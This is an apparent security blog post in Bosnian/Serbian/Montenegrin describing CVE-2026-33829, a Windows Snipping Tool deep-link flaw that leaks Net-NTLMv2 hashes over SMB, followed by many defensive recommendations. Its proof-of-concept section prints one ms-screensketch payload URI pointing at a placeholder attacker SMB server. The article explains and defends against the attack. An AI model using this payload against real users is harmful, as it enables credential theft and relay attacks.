Windows Snipping Tool ranjivost

by ·

Nedavna ranjivost alatke Windows Snipping Tool otkrila je zabrinjavajući trend: zlonamjerni akteri mogu iskoristiti propust kako bi prisilili prijavne SMB veze sa udaljenim serverima, čime se ugrožavaju korisnički podaci za prijavu. Istraživanje BlackArrowSec Red Team sigurnosnog istraživača Margaruga pokazuje da ovakvi napadi predstavljaju ozbiljnu prijetnju, a sama ranjivost dodatno naglašava stalne rizike povezane sa obrađivačima internet adresa na Windows sistemima i ukazuje na nužnost jačih bezbjednosnih mjera koje bi spriječile zloupotrebu i zaštitile korisnike.

Snipping Tool

Windows Snipping Tool ranjivost; Source: Bing Image Creator

SNIPPING TOOL RANJIVOST

Snipping Tool ranjivost u Microsoft alatu, označena kao CVE-2026-33829, predstavlja ozbiljan problem jer izlaže korisnike potencijalnoj krađi heša Net-NTLM podataka za prijavu. Sigurnosni istraživač koji je otkrio ovaj propust naglasio je da se on krije u načinu na koji Windows Snipping Tool obrađuje registracije jedinstvenih identifikatora resursa (eng. uniform resource identifier – URI) dubokih veza koristeći šemu protokola ms-screensketch.

Opasnost ove ranjivosti leži u tome što je zlonamjerni akteri mogu iskoristiti kako bi prisilili Server Message Block – SMB vezu sa udaljenim serverom. Time se otvara mogućnost krađe osjetljivih korisničkih podataka za prijavu, ugrožavanja bezbjednosti i pokretanja daljih zlonamjernih aktivnosti. Ključno je razumjeti da pogođene verzije alata registruju duboke linkove putem pomenute šeme protokola, što zlonamjernim akterima daje prostor da manipulišu ovim registracijama.

Šema jedinstvenog identifikatora resursa (URI) ms-screensketch ima važnu ulogu jer omogućava korisnicima pristup određenim funkcijama unutar Snipping Tool aplikacije. Registrovanjem dubokih linkova, programeri i administratori obezbjeđuju prečice ili direktne putanje ka funkcijama bez potrebe da se prolazi kroz glavno okruženje alata. Međutim, nepravilno rukovanje ovim registracijama, kao što pokazuje ranjivost, može dovesti do ozbiljnih posljedica.

Sam proces iskorištavanja počinje kada zlonamjerni akteri kreiraju zlonamjernu internet vezu koristeći parametar ms-screensketch: edit. Ova pažljivo kreirana internet adresa (eng. uniform resource locator – URL) usmjerava parametar filePath ka eksternom SMB serveru kojim upravlja zlonamjerni akter. Korisnici se zatim obmanjuju da kliknu na vezu, najčešće putem phishing elektronskih poruka ili ugroženih internet lokacija.

Klikom na vezu, Snipping Tool se povezuje sa udaljenim serverom kako bi preuzeo lažnu datoteku, pri čemu u pozadini tiho otkriva heš lozinke NTLMv2 korisnika. Ovakav prikriveni pristup omogućava zlonamjernim akterima da ostanu neotkriveni dok ostvaruju cilj krađe osjetljivih podataka. Iako iskorištavanje zahtijeva učešće korisnika, to ne umanjuje njegovu ozbiljnost; naprotiv, naglašava značaj edukacije korisnika o prijetnjama i potrebu za bezbjednim navikama pri korištenju internet pregledača.

 

Mehanizam napada

Proces iskorištavanja ranjivosti CVE‑2026‑33829 započinje izradom posebne internet veze u kojoj se koristi parametar ms‑screensketch:edit. Zlonamjerni akteri usmjeravaju vrijednost filePath ka udaljenom SMB serveru pod njihovom kontrolom. Kada korisnik klikne na takav link, Snipping Tool uspostavlja vezu sa tim serverom i u pozadini šalje NTLMv2 lozinke u obliku heš vrijednosti.

Najčešći način da žrtva bude navedena na klik jeste putem lažnih poruka elektronske pošte ili ugroženih internet stranica. Veze su oblikovane tako da izgledaju bezopasno, ali zapravo vode ka udaljenim serverima zlonamjernih aktera. Na taj način se uspostavlja veza između korisničkog sistema i servera zlonamjernog aktera, što omogućava prenos osjetljivih podataka.

Ova vrsta napada oslanja se na kombinaciju tehničkog znanja i društvenog inženjeringa. Zlonamjerni akteri moraju precizno oblikovati internet adresu (URL) i istovremeno obezbijediti da njihov SMB server pravilno prihvata dolazne zahtjeve. Pored toga, mogu koristiti metode poput lažnog DNS odgovora ili manipulacije keš memorijom kako bi žrtva bila usmjerena na pogrešnu vezu.

Ranljivost Snipping Tool alata proizlazi iz načina na koji je alat razvijen. Radi lakšeg korištenja, omogućeno je registrovanje dubokih linkova putem jedinstvenog identifikatora resursa (URI) bez provjere unosa. Upravo ta ranjivost otvara prostor da zlonamjerni akteri iskoriste parametre i usmjere korisnike ka serverima pod svojom kontrolom. Nedostatak provjere unosa čini da se veza uspostavlja bez upozorenja.

Iako je za uspjeh napada potrebna interakcija korisnika, sama metoda pokazuje da i uz takav uslov zlonamjerni akteri mogu doći do osjetljivih podataka. Klik na zlonamjernu vezu dovoljan je da se uspostavi veza i prenese lozinka u heš obliku, što zlonamjernim akterima daje osnovu za dalja djelovanja.

 

Dokaz koncepta (PoC)

Dokaz koncepta (eng. proof‑of‑concept – PoC) koji je objavio istraživački tim Black Arrow Security pokazuje kako zlonamjerni akter može tiho da ukrade heševe Net‑NTLM podataka za prijavu korisnika tako što ih namami da posjete zlonamjernu internet stranicu.

Sam proces iskorištavanja zahtijeva vrlo malo tehničkog znanja od strane zlonamjernog aktera. Skladištenjem zlonamjerne internet adrese (URL) ili HTML stranice koja automatski aktivira duboku vezu, oni se mogu ubjedljivo predstaviti kao legitimni entiteti u ciljanom okruženju. Dokaz koncepta istraživačkog tima Black Arrow Security demonstrira napad pomoću jednog jedinstvenog identifikatora resursa (URI) koji pokreće internet pregledač:

textms-screensketch:edit?&filePath=\\<attacker-smb-server>\file.png&isTemporary=false&saved=true&source=Toast

Kada žrtva otvori ovu vezu, Snipping Tool se pokreće i tiho pokušava da učita udaljeni resurs preko SMB protokola. Tokom tog pokušaja povezivanja, Windows automatski prenosi korisnikov odgovor za Net‑NTLM provjeru identiteta na server zlonamjernog aktera, otkrivajući podatke za prijavu koji se zatim mogu krekovati van mreže ili koristiti u NTLM relejnim napadima na interne mrežne resurse.

Ovaj proces je posebno značajan zbog svoje transparentnosti u ime obje uključene strane – žrtve i zlonamjernog aktera. Alatka za isijecanje se otvara kako se očekuje, dok se NTLM provjera identiteta odvija u pozadini, što otežava otkrivanje iskorištavanja bez eksplicitnog saznanja o njegovom postojanju.

 

UTICAJ

Uticaj ranjivosti u Windows Snipping Tool alatu ogleda se prije svega u otvaranju prostora za krađu podataka za prijavu. Sama činjenica da se kroz jednostavan klik na zlonamjernu vezu može pokrenuti proces prenosa NTLM heša pokazuje koliko je korisnički sistem izložen. Time se stvara direktna veza između korisnika i udaljenog servera pod kontrolom zlonamjernog aktera, što dovodi do ugrožavanja povjerljivih informacija i povećava rizik od daljih zloupotreba.

Ova ranjivost ima širi uticaj na bezbjednosni ekosistem Windows okruženja. Registracija dubokih linkova putem jedinstvenog identifikatora resursa (URI) šeme ms‑screensketch, iako zamišljena kao olakšica za korisnike, pokazuje se kao propust koji omogućava manipulaciju. Posljedica je narušavanje povjerenja u osnovne funkcije sistema, jer alat koji je zamišljen da bude jednostavan i koristan postaje potencijalni kanal za napad.

Uticaj se osjeća i na nivou korisničkog ponašanja. Napadi koji zavise od interakcije korisnika, poput klika na zlonamjernu internet adresu (URL), ukazuju na važnost edukacije i svijesti o prijetnjama. Ranjivost Snipping Tool alata time ne pogađa samo tehnički aspekt sistema, već i navike korisnika, jer pokazuje kako društveni inženjering u kombinaciji sa tehničkim propustima može dovesti do ozbiljnih posljedica.

Na organizacionom nivou, ranjivost otvara pitanje povjerenja u standardne alate koji dolaze uz operativni sistem. Kada osnovne aplikacije postanu izvor rizika, to utiče na percepciju pouzdanosti cijelog sistema. Posljedice se mogu odraziti na poslovne mreže, gdje krađa podataka za prijavu može dovesti do širenja napada unutar infrastrukture i ugrožavanja osjetljivih resursa.

Uticaj se širi i na širu bezbjednosnu zajednicu, jer ovakvi propusti ukazuju na stalnu potrebu za pažljivim nadzorom i testiranjem alata koji se koriste svakodnevno. Demonstracija napada kroz dokaz koncepta pokazuje kako i jednostavne funkcije mogu biti iskorištene za složene prijetnje, čime se naglašava da bezbjednost mora biti osnovni prioritet u razvoju i održavanju sistema.

 

ZAKLJUČAK

Ranjivost u Snipping Tool alatu pokazuje kako i naizgled jednostavne funkcije mogu postati ulazna tačka za napade. Sama priroda propusta otkriva da se bezbjednosni problemi ne javljaju samo u složenim sistemima, već i u alatima koji se svakodnevno koriste, što dodatno naglašava osjetljivost digitalnog okruženja.

Demonstracija kroz dokaz koncepta jasno prikazuje da zlonamjerni akter može iskoristiti propust bez potrebe za naprednim znanjem. Time se otvara pitanje koliko su osnovni mehanizmi zaštite u operativnim sistemima spremni da odgovore na ovakve prijetnje. Sama transparentnost procesa, gdje se alat pokreće normalno dok se u pozadini odvija prenos podataka, čini napad posebno podmuklim.

Ovakvi primjeri ukazuju na to da granica između legitimne funkcionalnosti i zloupotrebe može biti vrlo tanka. Kada se korisnik obmanjuje da klikne na vezu koja izgleda bezopasno, a u pozadini se odvija prenos osjetljivih informacija, jasno je da se bezbjednost ne može posmatrati samo kroz tehničke parametre, već i kroz način na koji se funkcije predstavljaju korisnicima.

Objavljeni dokaz koncepta ima i širi značaj, jer pokazuje kako se propusti mogu dokumentovati i javno demonstrirati, čime se stvara pritisak na proizvođače da reaguju. Istovremeno, takva demonstracija služi kao podsjetnik da ranjivosti nisu uvijek vidljive na prvi pogled, već se otkrivaju tek kada se pokaže kako funkcija može biti iskorištena u praksi.

 

PREPORUKE

Pouzdane mjere zaštite imaju ključnu ulogu u smanjenju rizika koji nastaje zbog ranjivosti u Windows Snipping Tool alatu, jer pravovremeno sprječavaju zloupotrebu i štite podatke korisnika. U nastavku slijede preporuke koje mogu pomoći u jačanju sigurnosti i smanjenju izloženosti riziku:

  1. Organizacije i korisnici moraju primjenjivati zvanične bezbjednosne ispravke kompanije Microsoft objavljene 14. aprila 2026. godine kako bi zaštitili svoje sisteme od CVE-2026-33829. Ovaj korak treba preduzeti što je prije moguće da bi se spriječili potencijalni pokušaji zloupotrebe. Ispravka će otkloniti ranjivost u aplikaciji Snipping Tool.
  2. Radi dodatnog jačanja mrežne bezbjednosti, organizacijama se preporučuje da blokiraju odlazni SMB saobraćaj (port 445) na svom perimetru. Ova mjera sprječava NTLM hešove da komuniciraju sa spoljnim serverima, čime se smanjuje rizik od neovlaštenog pristupa. Primjena ovog podešavanja dodaće dodatni sloj zaštite protiv potencijalne zloupotrebe.
  3. Sprovesti edukaciju zaposlenih o opasnostima povezanim sa klikom na nepoznate veze i odobravanjem pokretanja aplikacija bez provjere od suštinskog je značaja za sprječavanje potencijalnih napada. Organizacije treba da redovno sprovode obuke kako bi naglasile važnost opreznog postupanja prilikom korištenja internet pregledača ili nepoznatih aplikacija.
  4. Timovi za bezbjednost moraju pratiti mrežni saobraćaj radi neobičnih odlaznih SMB konekcija ka nepoznatim lokacijama, što može ukazivati na pokušaje zloupotrebe. Primjena snažnog sistema za praćenje omogućiće organizacijama da pravovremeno otkriju i odgovore na potencijalne bezbjednosne prijetnje.
  5. Korisnicima se preporučuje da svoje sisteme održavaju ažurnim sa najnovijim Microsoft ažuriranjima. Redovno provjeravanje i instaliranje ispravki osigurava da se ranjivosti poput Snipping Tool CVE-2026-33829 otklone na vrijeme, čime se smanjuje rizik od zloupotrebe.
  6. Primjena politike liste dozvoljenih aplikacija može pomoći u sprječavanju pokretanja zlonamjernih aplikacija na korisničkim sistemima. Ova mjera će smanjiti vjerovatnoću potencijalnih bezbjednosnih proboja izazvanih iskorištavanjem ranjivosti poput Snipping Tool CVE-2026-33829.
  7. Uspostavljanje bezbjedne osnovne konfiguracije za Windows sisteme pomoći će u sprječavanju iskorištavanja ranjivosti poput Snipping Tool CVE-2026-33829. Ovo podrazumijeva podešavanje sistemskih postavki i primjenu bezbjednosnih politika koje smanjuju potencijalne rizike povezane sa ranjivošću.
  8. Segmentacija mreže na izolovane dijelove može smanjiti površinu napada ograničavanjem bočnog kretanja u slučaju napada. Primjena segmentacije mreže otežaće zlonamjernim akterima iskorištavanje ranjivosti poput Snipping Tool CVE-2026-33829.
  9. Razviti i primjenjivati plan odgovora na sajber prijtnje je od suštinskog značaja za pravovremeno i efikasno reagovanje na potencijalne napade izazvane iskorištavanjem ranjivosti Windows Snipping Tool. Ovo podrazumijeva uspostavljanje procedura za otkrivanje, obuzdavanje, uklanjanje i oporavak od incidenata.
  10. Sprovoditi redovne bezbjednosne procjene koje će pomoći u pravovremenom otkrivanju ranjivosti poput Snipping Tool CVE-2026-33829. Primjena ove mjere osigurava da se potencijalni rizici otklone prije nego što ih zlonamjerni akteri mogu iskoristiti.
  11. Uspostavljanje bezbjedne politike “Doneseš svoj uređaj” (eng. bring your own device – BYOD) od suštinskog je značaja za organizacije koje dozvoljavaju zaposlenima da koriste lične uređaje na mreži. Ovo podrazumijeva primjenu bezbjednosnih politika i procedura koje smanjuju potencijalne rizike povezane sa ranjivostima poput Snipping Tool CVE-2026-33829.
  12. Redovno pregledanje sistemskih dnevnika pomoći će u otkrivanju neobičnih aktivnosti, koje mogu ukazivati na pokušaje zloupotrebe izazvane iskorištavanjem ranjivosti Windows Snipping Tool Primjena ove mjere osigurava pravovremeno otkrivanje potencijalnih bezbjednosnih prijetnji.
  13. Razviti i primjenjivati efikasan plan rezervnih kopija i oporavka od suštinskog je značaja za smanjivanje prekida rada i gubitka podataka usljed potencijalnih napada izazvanih iskorištavanjem ranjivosti poput Snipping Tool CVE-2026-33829.
  14. Uspostavljanje bezbjedne politike za rad na daljinu od suštinskog je značaja za organizacije koje dozvoljavaju zaposlenima da rade van kancelarije. Ovo podrazumijeva primjenu bezbjednosnih politika i procedura koje smanjuju potencijalne rizike povezane sa ranjivostima poput Snipping Tool CVE-2026-33829, uključujući osiguravanje da svi uređaji koje koriste zaposleni budu ažurni sa najnovijim ispravkama.
  15. Sprovoditi redovne vježbe testiranja penetracije pomoći će u otkrivanju ranjivosti poput Snipping Tool CVE-2026-33829 koje su možda propuštene tokom rutinskih testiranja ili procjena. Primjena ove mjere osigurava da se potencijalni rizici otklone prije nego što ih zlonamjerni akteri mogu iskoristiti.
  16. Uspostavljanje bezbjedne politike za oblak od suštinskog je značaja za organizacije koje koriste usluge oblaka za čuvanje osjetljivih podataka. Ovo podrazumijeva primjenu bezbjednosnih politika i procedura koje smanjuju potencijalne rizike povezane sa ranjivostima poput Snipping Tool CVE-2026-33829, uključujući osiguravanje da svi korišteni uređaji budu ažurni sa najnovijim ispravkama.
  17. Redovno pregledanje bezbjednosnih politika i procedura pomoći će da one ostanu efikasne u rješavanju novih prijetnji izazvanih iskorištavanjem ranjivosti poput Snipping Tool CVE-2026-33829. Primjena ove mjere osigurava da organizacije budu korak ispred potencijalnih rizika povezanih sa razvojem sajber prijetnji.

Primjena ovih preporuka od suštinskog je značaja za zaštitu od ranjivosti Windows Snipping Tool alata. Pridržavanjem ovih smjernica i stalnim informisanjem o novim bezbjednosnim prijetnjama, organizacije i korisnici mogu značajno smanjiti svoju izloženost potencijalnim napadima.

Tags:

You may also like...

Leave a Reply

Your email address will not be published. Required fields are marked *


The reCAPTCHA verification period has expired. Please reload the page.